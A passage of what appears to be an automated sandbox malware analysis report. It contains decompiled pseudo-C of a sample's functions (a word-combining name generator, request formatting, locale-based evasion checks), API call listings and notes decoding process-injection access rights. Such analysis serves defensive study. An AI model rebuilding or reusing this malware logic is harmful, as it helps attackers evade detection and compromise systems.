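Run as a script it prints one line per API call. For the entries on this page the values decode to NTDL, ZwCr, ZwMa, ZwUn, RtlN and ZwCl in E02BD6BF9, to HKLM, HKCU and Soft for the three string references in E02BD4C94, and 0010047A to SYNCHRONIZE plus PROCESS_CREATE_THREAD, VM_OPERATION, VM_READ, VM_WRITE, DUP_HANDLE and QUERY_INFORMATION, the set of rights needed to write into and start a thread in another process. Note how the string pointers are formed: each is the runtime value at 0x2bda348 plus a fixed delta. With the base value 0x9dd5a8 that the decompiler recorded, 0x9dd5a8 + 0x2bdb436 = 0x35b89de, which falls in the same 0x35bxxxx range as the other runtime pointers on this page (0x35b95c0, 0x35b9600, 0x35b9e40) rather than inside the dumped image at 0x02bd0000; that is consistent with the strings living in a separately allocated region, and would explain why the API list can show only the first DWORD of each name (an inference from the values shown, not something the report states).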

                      C-Code - Quality: 39%
                      			E02BD454F(void* __eax, void* __ecx) {
                      				char _v8;
                      				void* _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				void* __esi;
                      				intOrPtr _t36;
                      				intOrPtr* _t37;
                      				intOrPtr* _t39;
                      				void* _t53;
                      				long _t58;
                      				void* _t59;
                      
                      				_t53 = __ecx;
                      				_t59 = __eax;
                      				_t58 = 0;
                      				ResetEvent( *(__eax + 0x1c));
                      				_push( &_v8);
                      				_push(4);
                      				_push( &_v20);
                      				_push( *((intOrPtr*)(_t59 + 0x18)));
                      				if( *0x2bda160() != 0) {
                      					L5:
                      					if(_v8 == 0) {
                      						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                      						L21:
                      						return _t58;
                      					}
                      					 *0x2bda174(0, 1,  &_v12);
                      					if(0 != 0) {
                      						_t58 = 8;
                      						goto L21;
                      					}
                      					_t36 = E02BD33DC(0x1000);
                      					_v16 = _t36;
                      					if(_t36 == 0) {
                      						_t58 = 8;
                      						L18:
                      						_t37 = _v12;
                      						 *((intOrPtr*)( *_t37 + 8))(_t37);
                      						goto L21;
                      					}
                      					_push(0);
                      					_push(_v8);
                      					_push( &_v20);
                      					while(1) {
                      						_t39 = _v12;
                      						_t56 =  *_t39;
                      						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                      						ResetEvent( *(_t59 + 0x1c));
                      						_push( &_v8);
                      						_push(0x1000);
                      						_push(_v16);
                      						_push( *((intOrPtr*)(_t59 + 0x18)));
                      						if( *0x2bda160() != 0) {
                      							goto L13;
                      						}
                      						_t58 = GetLastError();
                      						if(_t58 != 0x3e5) {
                      							L15:
                      							E02BD61DA(_v16);
                      							if(_t58 == 0) {
                      								_t58 = E02BD2B18(_v12, _t59);
                      							}
                      							goto L18;
                      						}
                      						_t58 = E02BD16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
                      						if(_t58 != 0) {
                      							goto L15;
                      						}
                      						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                      						if(_t58 != 0) {
                      							goto L15;
                      						}
                      						L13:
                      						_t58 = 0;
                      						if(_v8 == 0) {
                      							goto L15;
                      						}
                      						_push(0);
                      						_push(_v8);
                      						_push(_v16);
                      					}
                      				}
                      				_t58 = GetLastError();
                      				if(_t58 != 0x3e5) {
                      					L4:
                      					if(_t58 != 0) {
                      						goto L21;
                      					}
                      					goto L5;
                      				}
                      				_t58 = E02BD16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
                      				if(_t58 != 0) {
                      					goto L21;
                      				}
                      				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                      				goto L4;
                      			}


                      Instruction addresses (one per decompiled line, in order; 0x00000000 where the line has no address): 0x02bd454f 0x02bd455e 0x02bd4563 0x02bd4565 0x02bd456a 0x02bd456b 0x02bd4570 0x02bd4571 0x02bd457c 0x02bd45ad 0x02bd45b2 0x02bd4675 0x02bd4678 0x02bd467e 0x02bd467e 0x02bd45bf 0x02bd45c7 0x02bd4672 0x00000000 0x02bd4672 0x02bd45d2 0x02bd45d7 0x02bd45dc 0x02bd4664 0x02bd4665 0x02bd4665 0x02bd466b 0x00000000 0x02bd466b 0x02bd45e2 0x02bd45e4 0x02bd45ea 0x02bd45eb 0x02bd45eb 0x02bd45ee 0x02bd45f1 0x02bd45f7 0x02bd45fc 0x02bd45fd 0x02bd4602 0x02bd4605 0x02bd4610 0x00000000 0x00000000 0x02bd4618 0x02bd4620 0x02bd4649 0x02bd464c 0x02bd4653 0x02bd465e 0x02bd465e 0x00000000 0x02bd4653 0x02bd462c 0x02bd4630 0x00000000 0x00000000 0x02bd4632 0x02bd4637 0x00000000 0x00000000 0x02bd4639 0x02bd4639 0x02bd463e 0x00000000 0x00000000 0x02bd4640 0x02bd4641 0x02bd4644 0x02bd4644 0x02bd45eb 0x02bd4584 0x02bd458c 0x02bd45a5 0x02bd45a7 0x00000000 0x00000000 0x00000000 0x02bd45a7 0x02bd4598 0x02bd459c 0x00000000 0x00000000 0x02bd45a2 0x00000000

                      APIs
                      • ResetEvent.KERNEL32(?), ref: 02BD4565
                      • GetLastError.KERNEL32 ref: 02BD457E
                        • Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD
                      • ResetEvent.KERNEL32(?), ref: 02BD45F7
                      • GetLastError.KERNEL32 ref: 02BD4612
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: ErrorEventLastReset$MultipleObjectsWait
                      • String ID: @MqtNqt
                      • API String ID: 2394032930-2883916605
                      • Opcode ID: 4181354956f1467b0f57c79893e426015de4c63f3af8996e360a803bd82e39f1
                      • Instruction ID: c1eb03102aa8253ee10c3a599b99ba8c47464a0c62d963f7b04bc189c90d247b
                      • Opcode Fuzzy Hash: 4181354956f1467b0f57c79893e426015de4c63f3af8996e360a803bd82e39f1
                      • Instruction Fuzzy Hash: E131BF36A40604ABCB219FA5DC44BEEB7BAFF84364F1449E8E556E7190FB30E9458B10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 50%
                      			E02BD5364(void** __esi) {
                      				intOrPtr _v0;
                      				intOrPtr _t4;
                      				intOrPtr _t6;
                      				void* _t8;
                      				intOrPtr _t10;
                      				void* _t11;
                      				void** _t13;
                      
                      				_t13 = __esi;
                      				_t4 =  *0x2bda3cc; // 0x35b9600
                      				__imp__(_t4 + 0x40);
                      				while(1) {
                      					_t6 =  *0x2bda3cc; // 0x35b9600
                      					_t1 = _t6 + 0x58; // 0x0
                      					if( *_t1 == 0) {
                      						break;
                      					}
                      					Sleep(0xa); // wait 10 ms and re-check the flag at +0x58
                      				}
                      				_t8 =  *_t13;
                      				if(_t8 != 0 && _t8 != 0x2bda030) {
                      					HeapFree( *0x2bda2d8, 0, _t8); // free the previous buffer unless it is the in-image address 0x2bda030
                      				}
                      				_t13[1] = E02BD12C6(_v0, _t13);
                      				_t10 =  *0x2bda3cc; // 0x35b9600
                      				_t11 = _t10 + 0x40;
                      				__imp__(_t11); // RtlLeaveCriticalSection (see APIs below, ref: 02BD53BB)
                      				return _t11;
                      			}

                      Statement addresses (the listing's address column, one entry per statement in source order): 0x02bd5364, 0x02bd5364, 0x02bd536d, 0x02bd537d, 0x02bd537d, 0x02bd5382, 0x02bd5387, 0x00000000, 0x00000000, 0x02bd5377, 0x02bd5377, 0x02bd5389, 0x02bd538d, 0x02bd539f, 0x02bd539f, 0x02bd53af, 0x02bd53b2, 0x02bd53b7, 0x02bd53bb, 0x02bd53c1

                      APIs
                      • RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD536D
                      • Sleep.KERNEL32(0000000A), ref: 02BD5377
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD539F
                      • RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD53BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                      • String ID: Uqt
                      • API String ID: 58946197-2320327147
                      • Opcode ID: d59dece5da231b5c7a8fc78b8eab1519c0005ed03d0a60fe171a27c2f897477c
                      • Instruction ID: e958198c26a8fef2c06045159f120da5e9b5583be8616ae8ac611b7e8706a98d
                      • Opcode Fuzzy Hash: d59dece5da231b5c7a8fc78b8eab1519c0005ed03d0a60fe171a27c2f897477c
                      • Instruction Fuzzy Hash: 24F05830A82601ABEB24AF68EC58FC63BF9EF44390B44C840F546C7260F730D860CB24
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E02BD607C() {
                      				void* _v0;
                      				void** _t3;
                      				void** _t5;
                      				void** _t7;
                      				void** _t8;
                      				void* _t10;
                      
                      				_t3 =  *0x2bda3cc; // 0x35b9600
                      				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection on the same lock (offset 0x40) as E02BD5364 (ref: 02BD6085)
                      				while(1) {
                      					_t5 =  *0x2bda3cc; // 0x35b9600
                      					_t1 =  &(_t5[0x16]); // 0x0 (offset 0x58, the same flag E02BD5364 spins on)
                      					if( *_t1 == 0) {
                      						break;
                      					}
                      					Sleep(0xa);
                      				}
                      				_t7 =  *0x2bda3cc; // 0x35b9600
                      				_t10 =  *_t7;
                      				if(_t10 != 0 && _t10 != 0x2bdb142) {
                      					HeapFree( *0x2bda2d8, 0, _t10);
                      					_t7 =  *0x2bda3cc; // 0x35b9600
                      				}
                      				 *_t7 = _v0;
                      				_t8 =  &(_t7[0x10]);
                      				__imp__(_t8); // RtlLeaveCriticalSection (see APIs below, ref: 02BD60D2)
                      				return _t8;
                      			}

                      Statement addresses (the listing's address column, one entry per statement in source order): 0x02bd607c, 0x02bd6085, 0x02bd6095, 0x02bd6095, 0x02bd609a, 0x02bd609f, 0x00000000, 0x00000000, 0x02bd608f, 0x02bd608f, 0x02bd60a1, 0x02bd60a6, 0x02bd60aa, 0x02bd60bd, 0x02bd60c3, 0x02bd60c3, 0x02bd60cc, 0x02bd60ce, 0x02bd60d2, 0x02bd60d8

                      APIs
                      • RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD6085
                      • Sleep.KERNEL32(0000000A), ref: 02BD608F
                      • HeapFree.KERNEL32(00000000), ref: 02BD60BD
                      • RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD60D2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                      • String ID: Uqt
                      • API String ID: 58946197-2320327147
                      • Opcode ID: 2f631fefb14dce78ac9d7075c64b213f5db50371be964c5ef73258b7b4deb037
                      • Instruction ID: fb6d162e95c6cbb149556cba029bbca474587e1ef40a7d325f36a980f77e2197
                      • Opcode Fuzzy Hash: 2f631fefb14dce78ac9d7075c64b213f5db50371be964c5ef73258b7b4deb037
                      • Instruction Fuzzy Hash: 8AF05E78A826019FE718DF58F8A9B9537B5EB84380B448845E802C7390F330A864CA14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 22%
                      			E02BD7040(signed int __eax, signed int _a4, signed int _a8) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				signed int _v20;
                      				intOrPtr _t81;
                      				char _t83;
                      				signed int _t90;
                      				signed int _t97;
                      				signed int _t99;
                      				char _t101;
                      				unsigned int _t102;
                      				intOrPtr _t103;
                      				char* _t107;
                      				signed int _t110;
                      				signed int _t113;
                      				signed int _t118;
                      				signed int _t122;
                      				intOrPtr _t124;
                      
                      				_t102 = _a8;
                      				_t118 = 0;
                      				_v20 = __eax;
                      				_t122 = (_t102 >> 2) + 1;
                      				_v8 = 0;
                      				_a8 = 0;
                      				_t81 = E02BD33DC(_t122 << 2);
                      				_v16 = _t81;
                      				if(_t81 == 0) {
                      					_push(8);
                      					_pop(0);
                      					L37:
                      					return 0;
                      				}
                      				_t107 = _a4;
                      				_a4 = _t102;
                      				_t113 = 0;
                      				while(1) {
                      					_t83 =  *_t107;
                      					if(_t83 == 0) {
                      						break;
                      					}
                      					if(_t83 == 0xd || _t83 == 0xa) {
                      						if(_t118 != 0) {
                      							if(_t118 > _v8) {
                      								_v8 = _t118;
                      							}
                      							_a8 = _a8 + 1;
                      							_t118 = 0;
                      						}
                      						 *_t107 = 0;
                      						goto L16;
                      					} else {
                      						if(_t118 != 0) {
                      							L10:
                      							_t118 = _t118 + 1;
                      							L16:
                      							_t107 = _t107 + 1;
                      							_t15 =  &_a4;
                      							 *_t15 = _a4 - 1;
                      							if( *_t15 != 0) {
                      								continue;
                      							}
                      							break;
                      						}
                      						if(_t113 == _t122) {
                      							L21:
                      							if(_a8 <= 0x20) {
                      								_push(0xb);
                      								L34:
                      								_pop(0);
                      								L35:
                      								E02BD61DA(_v16);
                      								goto L37;
                      							}
                      							_t24 = _v8 + 5; // 0xcdd8d2f8
                      							_t103 = E02BD33DC((_v8 + _t24) * _a8 + 4);
                      							if(_t103 == 0) {
                      								_push(8);
                      								goto L34;
                      							}
                      							_t90 = _a8;
                      							_a4 = _a4 & 0x00000000;
                      							_v8 = _v8 & 0x00000000;
                      							_t124 = _t103 + _t90 * 4;
                      							if(_t90 <= 0) {
                      								L31:
                      								 *0x2bda318 = _t103;
                      								goto L35;
                      							}
                      							do {
                      								_t110 = 0x3c6ef35f + _v20 * 0x19660d; // LCG step (x = x * 0x19660d + 0x3c6ef35f) seeded from the __eax argument
                      								_v20 = 0x3c6ef35f + _t110 * 0x19660d; // second LCG step; both values select word indices below
                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4))); // lstrcpy (ref: 02BD713D): first selected word
                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4))); // lstrcat (ref: 02BD7152): append the second one
                      								_v12 = _v12 & 0x00000000;
                      								if(_a4 <= 0) {
                      									goto L30;
                      								} else {
                      									goto L26;
                      								}
                      								while(1) {
                      									L26:
                      									_t99 = _v12;
                      									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // lstrcmp (ref: 02BD7169) against entries already generated
                      									if(_t99 == 0) {
                      										break;
                      									}
                      									_v12 = _v12 + 1;
                      									if(_v12 < _a4) {
                      										continue;
                      									}
                      									goto L30;
                      								}
                      								_v8 = _v8 - 1;
                      								L30:
                      								_t97 = _a4;
                      								_a4 = _a4 + 1;
                      								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                      								__imp__(_t124); // lstrlen (ref: 02BD718D)
                      								_v8 = _v8 + 1;
                      								_t124 = _t124 + _t97 + 1;
                      							} while (_v8 < _a8);
                      							goto L31;
                      						}
                      						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                      						_t101 = _t83;
                      						if(_t83 - 0x61 <= 0x19) { // first character of a word: map 'a'..'z' to upper case
                      							_t101 = _t101 - 0x20;
                      						}
                      						 *_t107 = _t101;
                      						_t113 = _t113 + 1;
                      						goto L10;
                      					}
                      				}
                      				if(_t118 != 0) {
                      					if(_t118 > _v8) {
                      						_v8 = _t118;
                      					}
                      					_a8 = _a8 + 1;
                      				}
                      				goto L21;
                      			}

                      Statement addresses (the listing's address column, one entry per statement in source order): 0x02bd7047, 0x02bd704e, 0x02bd7053, 0x02bd7056, 0x02bd705d, 0x02bd7060, 0x02bd7063, 0x02bd7068, 0x02bd706d, 0x02bd71c1, 0x02bd71c3, 0x02bd71c5, 0x02bd71ca, 0x02bd71ca, 0x02bd7073, 0x02bd7076, 0x02bd7079, 0x02bd707b, 0x02bd707b, 0x02bd707f, 0x00000000, 0x00000000, 0x02bd7083, 0x02bd70af, 0x02bd70b4, 0x02bd70b6, 0x02bd70b6, 0x02bd70b9, 0x02bd70bc, 0x02bd70bc, 0x02bd70be, 0x00000000, 0x02bd7089, 0x02bd708b, 0x02bd70aa, 0x02bd70aa, 0x02bd70c1, 0x02bd70c1, 0x02bd70c2, 0x02bd70c2, 0x02bd70c5, 0x00000000, 0x00000000, 0x00000000, 0x02bd70c5, 0x02bd708f, 0x02bd70d6, 0x02bd70da, 0x02bd71b4, 0x02bd71b6, 0x02bd71b6, 0x02bd71b7, 0x02bd71ba, 0x00000000, 0x02bd71ba, 0x02bd70e3, 0x02bd70f4, 0x02bd70f8, 0x02bd71b0, 0x00000000, 0x02bd71b0, 0x02bd70fe, 0x02bd7101, 0x02bd7105, 0x02bd7109, 0x02bd710e, 0x02bd71a6, 0x02bd71a6, 0x00000000, 0x02bd71ac, 0x02bd7119, 0x02bd7122, 0x02bd7136, 0x02bd713d, 0x02bd7152, 0x02bd7158, 0x02bd7160, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x02bd7162, 0x02bd7162, 0x02bd7162, 0x02bd7169, 0x02bd7171, 0x00000000, 0x00000000, 0x02bd7173, 0x02bd717c, 0x00000000, 0x00000000, 0x00000000, 0x02bd717e, 0x02bd7180, 0x02bd7183, 0x02bd7183, 0x02bd7186, 0x02bd718a, 0x02bd718d, 0x02bd7193, 0x02bd7196, 0x02bd719d, 0x00000000, 0x02bd7119, 0x02bd7094, 0x02bd709c, 0x02bd70a2, 0x02bd70a4, 0x02bd70a4, 0x02bd70a7, 0x02bd70a9, 0x00000000, 0x02bd70a9, 0x02bd7083, 0x02bd70c9, 0x02bd70ce, 0x02bd70d0, 0x02bd70d0, 0x02bd70d3, 0x02bd70d3, 0x00000000

                      APIs
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • lstrcpy.KERNEL32(43175AC4,00000020), ref: 02BD713D
                      • lstrcat.KERNEL32(43175AC4,00000020), ref: 02BD7152
                      • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02BD7169
                      • lstrlen.KERNEL32(43175AC4), ref: 02BD718D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                      • String ID:
                      • API String ID: 3214092121-3916222277
                      • Opcode ID: 19d8a2029e6781b89df156163bc7d7416c4a14434cba2eaec107cc9efd70ad21
                      • Instruction ID: d5d09e7b20ffd2f7e2b4fe97945911958441e96977c5ff05e862a80b84392742
                      • Opcode Fuzzy Hash: 19d8a2029e6781b89df156163bc7d7416c4a14434cba2eaec107cc9efd70ad21
                      • Instruction Fuzzy Hash: E651D171A00218EFDF20CF99C484BEDFBB6FF41354F54819AE8199B245EB709A51DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190B31
                      • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 02190B91
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0219098C,0000000A), ref: 02190BBC
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190BDD
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190BE5
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                      • String ID:
                      • API String ID: 2685682793-0
                      • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                      • Instruction ID: a7de4ef9d85b89b613ff80853d031b625f3f4cf982b10cd029f0e49033f59807
                      • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                      • Instruction Fuzzy Hash: E521B3B6540208BFDB20EFA4CC84EAE7BADEB48359F114035FA06E7190E7709D44CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0219135F
                      • GetModuleHandleA.KERNEL32(00000000), ref: 0219136F
                      • GetCommandLineW.KERNEL32 ref: 0219137A
                        • Part of subcall function 02190F65: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 02190F9A
                        • Part of subcall function 02190F65: Sleep.KERNEL32(00000000,00000030), ref: 02190FE1
                        • Part of subcall function 02190F65: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 02191009
                        • Part of subcall function 02190F65: GetSystemDefaultUILanguage.KERNEL32 ref: 02191013
                        • Part of subcall function 02190F65: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 02191026
                      • HeapDestroy.KERNEL32 ref: 0219138D
                      • ExitProcess.KERNEL32 ref: 02191394
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                      • String ID:
                      • API String ID: 1393419808-0
                      • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                      • Instruction ID: 0bce58d7d363ef515ba56096739aa2f050106e77b729f28188fbe18cf40004ff
                      • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                      • Instruction Fuzzy Hash: 4FE0B6B0403224ABC7116F70BE0CA4E7E28BB49B527000535E505F2124DB3847818A9C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E02BD35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                      				void* _v8;
                      				char _v48;
                      				void* __edi;
                      				intOrPtr _t22;
                      				intOrPtr _t30;
                      				intOrPtr _t34;
                      				intOrPtr* _t42;
                      				void* _t43;
                      				void* _t46;
                      				intOrPtr* _t48;
                      				void* _t49;
                      				intOrPtr _t51;
                      
                      				_t42 = _a16;
                      				_t48 = __eax;
                      				_t22 =  *0x2bda348; // 0x9dd5a8
                      				_t2 = _t22 + 0x2bdb7bb; // 0x657a6973
                      				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                      				if( *0x2bda2ec >= 5) {
                      					_t30 = E02BD3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                      					L5:
                      					_a4 = _t30;
                      					L6:
                      					if(_a4 != 0) {
                      						L9:
                      						 *0x2bda2ec =  *0x2bda2ec + 1;
                      						L10:
                      						return _a4;
                      					}
                      					_t50 = _a16;
                      					 *_t48 = _a16;
                      					_t49 = _v8;
                      					 *_t42 = E02BD56B9(_t50, _t49);
                      					_t34 = E02BD77A5(_t49, _t50);
                      					if(_t34 != 0) {
                      						 *_a8 = _t49;
                      						 *_a12 = _t34;
                      						if( *0x2bda2ec < 5) {
                      							 *0x2bda2ec =  *0x2bda2ec & 0x00000000;
                      						}
                      						goto L10;
                      					}
                      					_a4 = 0xbf;
                      					E02BD63F6();
                      					HeapFree( *0x2bda2d8, 0, _t49);
                      					goto L9;
                      				}
                      				_t51 =  *0x2bda3e0; // 0x35b9c48
                      				if(RtlAllocateHeap( *0x2bda2d8, 0, 0x800) == 0) {
                      					_a4 = 8;
                      					goto L6;
                      				}
                      				_t30 = E02BD2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                      				goto L5;
                      			}

                      Statement addresses (the listing's address column, one entry per statement in source order): 0x02bd35d9, 0x02bd35e0, 0x02bd35e4, 0x02bd35e9, 0x02bd35f4, 0x02bd3604, 0x02bd3653, 0x02bd3658, 0x02bd3658, 0x02bd365b, 0x02bd365f, 0x02bd3699, 0x02bd3699, 0x02bd369f, 0x02bd36a6, 0x02bd36a6, 0x02bd3661, 0x02bd3664, 0x02bd3666, 0x02bd3673, 0x02bd3675, 0x02bd367c, 0x02bd36b3, 0x02bd36b8, 0x02bd36ba, 0x02bd36bc, 0x02bd36bc, 0x00000000, 0x02bd36ba, 0x02bd367e, 0x02bd3685, 0x02bd3693, 0x00000000, 0x02bd3693, 0x02bd3606, 0x02bd3621, 0x02bd363b, 0x00000000, 0x02bd363b, 0x02bd3634, 0x00000000

                      APIs
                      • wsprintfA.USER32 ref: 02BD35F4
                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD3619
                        • Part of subcall function 02BD2B91: GetTickCount.KERNEL32 ref: 02BD2BA8
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2BF5
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C12
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C34
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C5B
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C7C
                        • Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2CA7
                        • Part of subcall function 02BD2B91: HeapFree.KERNEL32(00000000,?), ref: 02BD2CBA
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02BD3693
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: wsprintf$Heap$Free$AllocateCountTick
                      • String ID: Uqt
                      • API String ID: 1307794992-2320327147
                      • Opcode ID: 7e77ebf38732752fa9ccfc4e68d5f0f9bee05b6747d405803024899947dce69c
                      • Instruction ID: e2930dddeffba3478801f276bc18001b7f927613e3d3e311b3a7f191e98b4e39
                      • Opcode Fuzzy Hash: 7e77ebf38732752fa9ccfc4e68d5f0f9bee05b6747d405803024899947dce69c
                      • Instruction Fuzzy Hash: 29314C76901208EBCB01DFA5D894BDA3BFDFB08391F1084A2E905E7241E7709654CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E02BD6CDF(intOrPtr* __eax) {
                      				void* _v8;
                      				WCHAR* _v12;
                      				void* _v16;
                      				char _v20;
                      				void* _v24;
                      				intOrPtr _v28;
                      				void* _v32;
                      				intOrPtr _v40;
                      				short _v48;
                      				intOrPtr _v56;
                      				short _v64;
                      				intOrPtr* _t54;
                      				intOrPtr* _t56;
                      				intOrPtr _t57;
                      				intOrPtr* _t58;
                      				intOrPtr* _t60;
                      				void* _t61;
                      				intOrPtr* _t63;
                      				intOrPtr* _t65;
                      				short _t67;
                      				intOrPtr* _t68;
                      				intOrPtr* _t70;
                      				intOrPtr* _t72;
                      				intOrPtr* _t75;
                      				intOrPtr* _t77;
